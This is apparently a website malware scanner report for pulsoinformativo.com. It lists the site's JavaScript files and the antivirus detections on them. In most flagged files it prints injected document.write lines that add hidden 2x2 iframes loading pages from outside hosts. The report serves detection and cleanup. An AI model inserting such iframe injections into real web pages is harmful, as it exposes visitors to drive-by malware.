Malware Scanner report for pulsoinformativo.com

Malicious/Suspicious/Total urls checked: 9/0/15

9 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/23/23

23 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://pulsoinformativo.com/	200 OK Content-Length: 52043 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?i=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?i=593124>
http://pulsoinformativo.com/includes/functions/xajax/xajax_js/xajax_core.js	200 OK Content-Length: 39824 Content-Type: application/javascript	clean
http://pulsoinformativo.com/includes/js/iepngfix_tilebg.js	200 OK Content-Length: 4437 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var IEPNGFix = window.IEPNGFix \|\| {}; IEPNGFix.tileBG = function(elm, pngSrc, ready) { var data = this.data[ ... 3459 bytes are skipped ...> r: bgR }; }; IEPNGFix.update = function() { for (var i in IEPNGFix.data) { var t = IEPNGFix.data[i].tiles; if (t && t.elm && t.src) { IEPNGFix.tileBG(t.elm, t.src); } } }; IEPNGFix.update.timer = 0; if (window.attachEvent && !window.opera) { window.attachEvent('onresize', function() { clearTimeout(IEPNGFix.update.timer); IEPNGFix.update.timer = setTimeout(IEPNGFix.update, 100); }); } Antivirus reports: Avast JS:Iframe-AMJ [Trj] TrendMicro-HouseCall TROJ_GEN.F47V0328 NANO-Antivirus Trojan.Html.TwitScroll.bklyhq Norman Iframe.UW GData JS:Iframe-AMJ Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124>
http://pulsoinformativo.com/includes/js/general.js	200 OK Content-Length: 1913 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length, ... 1102 bytes are skipped ...='"+selObj.options[selObj.selectedIndex].value+"'"); if (restore) selObj.selectedIndex=0; } function SubmitEnter(myfield,e) { var keycode; if (window.event) keycode = window.event.keyCode; else if (e) keycode = e.which; else return true; if (keycode == 13) { myfield.form.submit(); return false; } else return true; } function MM_openBrWindow(theURL,winName,features) { window.open(theURL,winName,features); } Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124>
http://pulsoinformativo.com/includes/js/swfobject.js	200 OK Content-Length: 10095 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var swfobject=function(){var b="undefined",Q="object",n="Shockwave Flash",p="ShockwaveFlash.ShockwaveFlash",P="application/x ... 3212 bytes are skipped ...},addDomLoadEvent:f,addLoadEvent:R,getQueryParamValue:function(v){var u=K.location.search\|\|K.location.hash;if(v==null){return g(u)}if(u){var t=u.substring(1).split("&");for(var r=0;r<t.length;r++){if(t[r].substring(0,t[r].indexOf("="))==v){return g(t[r].substring((t[r].indexOf("=")+1)))}}}return""},expressInstallCallback:function(){if(A&&M){var q=C(m);if(q){q.parentNode.replaceChild(M,q);if(l){W(l,true);if(h.ie&&h.win){M.style.display="block"}}M=null;l=null;A=false}}}}}(); Antivirus reports: Avast JS:Iframe-AMJ [Trj] Norman Iframe.UW GData JS:Iframe-AMJ Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124>
http://pulsoinformativo.com/includes/js/jquery-1.3.2.min.js	200 OK Content-Length: 57590 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.\|\s)+&g ... 3150 bytes are skipped ...0]?o.css(this[0],F,false,K?"margin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]\|\|document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})(); Antivirus reports: AntiVir HTML/TwitScroll.B Avast JS:Iframe-AMM [Trj] nProtect Trojan.Iframe.BZW Comodo TrojWare.JS.Iframe.FK McAfee-GW-Edition JS/IFrame.gen.j Kaspersky HEUR:Trojan.Script.Generic Microsoft Exploit:HTML/IframeRef.DM MicroWorld-eScan Trojan.Iframe.BZW Fortinet JS/Iframe.HH!tr PCTools Exploit.IFrame McAfee JS/IFrame.gen.j F-Secure Trojan.Iframe.BZW VIPRE Malware.JS.Generic (JS) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.UW Sophos Troj/Iframe-JG GData Trojan.Iframe.BZW Symantec IFrame.Exploit Commtouch IFrame.gen ESET-NOD32 JS/Iframe.HH BitDefender Trojan.Iframe.BZW Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124>
http://pulsoinformativo.com/includes/js/ddaccordion.js	200 OK Content-Length: 11779 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var ddaccordion={ contentclassname:{}, expandone:function(headerclass, selected){ this.toggleone(headercl ... 3338 bytes are skipped ...eaderclass"]).get(), expandedindices) $(window).bind('unload', function(){ $('.'+config["headerclass"]).unbind() var expandedindices=[] $('.'+config["contentclass"]+":visible").each(function(index){ expandedindices.push($(this).attr('contentindex')) }) if (config.persiststate==true){ expandedindices=(expandedindices.length==0)? '-1c' : expandedindices ddaccordion.setCookie(config.headerclass, expandedindices) } }) }) } } Antivirus reports: AntiVir HTML/TwitScroll.B Avast JS:Iframe-AMQ [Trj] Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.BZW Emsisoft Trojan.Iframe.BZW (B) McAfee-GW-Edition JS/IFrame.gen.j Kaspersky HEUR:Trojan.Script.Generic Microsoft Exploit:HTML/IframeRef.DM MicroWorld-eScan Trojan.Iframe.BZW Fortinet JS/Iframe.HH!tr PCTools Exploit.IFrame McAfee JS/IFrame.gen.j VIPRE Malware.JS.Generic (JS) AVG HTML/Framer Norman Iframe.UW GData Trojan.Iframe.BZW BitDefender Trojan.Iframe.BZW ESET-NOD32 JS/Iframe.HH Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124>
http://pulsoinformativo.com/includes/js/sexylightbox.js	200 OK Content-Length: 22921 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var SexyLightBox = new Class({ getOptions: { name : 'SLB', zIndex : 65555, color ... 3421 bytes are skipped ...}, parseQuery: function (query) { if( !query ) return {}; var params = {}; var pairs = query.split(/[;&]/); for ( var i = 0; i < pairs.length; i++ ) { var pair = pairs[i].split('='); if ( !pair \|\| pair.length != 2 ) continue; params[unescape(pair[0])] = unescape(pair[1]).replace(/\+/g, ' '); } return params; } }); SexyLightBox.implement(new Events, new Options); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124>
http://pulsoinformativo.com/includes/js/multibox.js	200 OK Content-Length: 23342 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var MultiBox = new Class({ getOptions: function(){ return { initialWidth: 250, initialHeight: ... 3554 bytes are skipped ... this.str += '<param name="controls" value="ImageWindow" />'; this.str += '<param name="autostart" value="true" />'; this.str += '<embed src="'+this.contentObj.url+'" controls="ImageWindow" autostart="true" width="'+this.contentObj.width+'" height="'+this.contentObj.height+'"></embed>'; this.str += '<object/>'; } return obj; } }); MultiBox.implement(new Options); MultiBox.implement(new Events); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124>
http://pulsoinformativo.com/includes/js/overlay.js	200 OK Content-Length: 2898 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var Overlay = new Class({ getOptions: function(){ return { colour: '#B7E3F9', opacity: 0.8,... 1918 bytes are skipped ... var myCoords = this.options.container.getCoordinates(); this.container.setStyles({ top: myCoords.top+'px', height: myCoords.height+'px', left: myCoords.left+'px', width: myCoords.width+'px' }); } }, show: function(){ this.fade.start('opacity',0,this.options.opacity); }, hide: function(){ this.fade.start('opacity',this.options.opacity,0); } }); Overlay.implement(new Options); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124>
http://pulsoinformativo.com/includes/js/webticker_lib.js	200 OK Content-Length: 2499 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); TICKER_CONTENT = document.getElementById("TICKER").innerHTML; TICKER_RIGHTTOLEFT = false; TICKER_SPEED = 1;... 1706 bytes are skipped ...TTOLEFT && document.getElementById("TICKER").scrollLeft <= 0) document.getElementById("TICKER").scrollLeft = document.getElementById("TICKER").scrollWidth - document.getElementById("TICKER").offsetWidth; if(!TICKER_RIGHTTOLEFT && document.getElementById("TICKER").scrollLeft >= document.getElementById("TICKER").scrollWidth - document.getElementById("TICKER").offsetWidth) document.getElementById("TICKER").scrollLeft = 0; window.setTimeout("TICKER_tick()", 30); } Antivirus reports: Avast HTML:Iframe-BNK [Trj] Ad-Aware Trojan.Iframe.CEG nProtect Trojan.Iframe.CEG Emsisoft Trojan.Iframe.CEG (B) Comodo TrojWare.HTML.iFrame.TWTR Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CEG F-Secure Trojan.Iframe.CEG Norman Iframe.YR GData Trojan.Iframe.CEG BitDefender Trojan.Iframe.CEG Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124>
http://www.tutiempo.net/TTapi/cc/SpW4g9HmErmlRZ	200 OK Content-Length: 1126 Content-Type: application/x-javascript	clean
http://pulsoinformativo.com/includes/js/countdown.js	200 OK Content-Length: 2838 Content-Type: application/javascript	suspicious
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124>
http://pulsoinformativo.com/index.php	200 OK Content-Length: 52043 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?i=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?i=593124>
http://pulsoinformativo.com/pulso.php?mostrar=1	200 OK Content-Length: 39073 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?i=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?i=593124>

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: pulsoinformativo.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 27 Jan 2015 04:10:31 GMT
Pragma: no-cache
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html; charset=utf-8;
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9e9712fd985a1d51001a20343e2a6f80; path=/
X-Powered-By: PHP/5.3.29

Second query (visit from search engine):
GET / HTTP/1.1
Host: pulsoinformativo.com
Referer: http://www.google.com/search?q=pulsoinformativo.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=pulsoinformativo.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://pulsoinformativo.com/

Result: pulsoinformativo.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for pulsoinformativo.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools